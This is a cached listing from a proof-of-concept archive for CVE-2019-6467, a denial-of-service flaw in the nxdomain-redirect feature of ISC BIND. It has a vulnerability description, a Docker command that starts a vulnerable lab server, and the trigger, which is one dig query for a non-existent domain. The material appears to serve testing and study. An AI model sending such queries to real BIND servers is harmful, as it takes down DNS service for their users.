CVE-2019-6467 PoC — ISC BIND 安全漏洞

Source

https://github.com/knqyf263/CVE-2019-6467

Associated Vulnerability

Title:ISC BIND 安全漏洞 (CVE-2019-6467)
Description:ISC BIND是美国ISC公司的一套实现了DNS协议的开源软件。 ISC BIND 9.12.0版本至9.12.4版本和9.14.0版本（包括：9.13 development branch版本）中的nxdomain-redirect功能存在安全漏洞。攻击者可利用该漏洞造成BIND退出，导致拒绝服务。

Description

CVE-2019-6467 (BIND nxdomain-redirect)

Readme

# CVE-2019-6467
BIND nxdomain-redirect

For educational purposes only

![demo](imgs/cve-2019-6467.gif)

## Run

```
$ docker run --rm --name cve-2019-6467 -it -p 53:53/udp knqyf263/cve-2019-6467
```

## Exploit
Normal query

```
$ dig @127.0.0.1 nxdomain.example.com
```

`nxdomain` can be replaced by anything that means non-existent domain name. (e.g. foobar.example.com)


## Reference
- https://ftp.isc.org/isc/bind/9.12.4-P1/RELEASE-NOTES-bind-9.12.4-P1.html
- https://ftp.isc.org/isc/bind9/9.14.1/RELEASE-NOTES-bind-9.14.1.html

File Snapshot


 [4.0K]  /data/pocs/ec74838cc68955dcde887760735ddd0c8a2256db
├── [4.0K]  contents
│   ├── [ 655]  example.com.zone
│   ├── [  37]  named
│   └── [1.9K]  named.conf
├── [1.8K]  Dockerfile
├── [4.0K]  imgs
│   └── [1.5M]  cve-2019-6467.gif
├── [1.0K]  LICENSE
└── [ 534]  README.md

2 directories, 7 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!